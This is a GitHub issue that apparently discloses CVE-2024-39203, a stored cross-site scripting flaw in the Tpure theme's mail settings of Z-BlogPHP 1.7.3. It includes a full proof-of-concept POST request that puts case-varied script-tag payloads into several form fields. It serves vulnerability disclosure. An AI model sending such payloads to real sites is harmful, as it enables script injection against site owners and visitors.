Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2024-39203 #1

Open
5r1an opened this issue Jul 4, 2024 · 0 comments
Open

CVE-2024-39203 #1

5r1an opened this issue Jul 4, 2024 · 0 comments

Comments

@5r1an
Copy link
Owner

5r1an commented Jul 4, 2024

[CVE ID]
CVE-2024-39203

[Suggested description]
A cross-site scripting (XSS) vulnerability in the Backend Theme.
Management module of Z-BlogPHP v1.7.3 allows attackers to execute
arbitrary web scripts or HTML via a crafted payload.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230

[Affected Product Code Base]
Z-BlogPHP - <=1.7.3

[Affected Component]
Z-BlogPHP is an open-source PHP based blog system developed by Z-Blog.
Z-LogPHP1.7.3 Backend Theme Management - Tuoyuan Pure Theme has hundreds of storage type XSS vulnerability points

[Attack Type]
Context-dependent

[CVE Impact Other]
XSS

[Attack Vectors]
POST http://localhost/zblogphp/zb_users/theme/tpure/main.php?act=mail HTTP/1.1

csrfToken=ba34555f34939327c8d05d964d18b4d5&PostMAILON=&SMTP_SSL=0&SMTP_HOST=smtp.163.com&SMTP_PORT=25&FROM_EMAIL=&SMTP_PASS="><ScRiPt>alert(6)</ScRiPt>&FROM_NAME="><ScRiPt>alert(7)</ScRiPt>&MAIL_TO="><ScRiPt>alert(5)</ScRiPt>&PostNEWARTICLEMAILSENDON=0"><ScRiPt>alert(4)</ScRiPt>&PostEDITARTICLEMAILSENDON=0"><ScRiPt>alert(3)</ScRiPt>&PostCMTMAILSENDON=0"><ScRiPt>alert(2)</ScRiPt>&PostREPLYMAILSENDON=0"><ScRiPt>alert(1)</ScRiPt>

[Reference]
http://z-blogphp.com
https://github.com/zblogcn/zblogphp/releases/tag/v1.7.3-3230

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
Status: No status
Development

No branches or pull requests

1 participant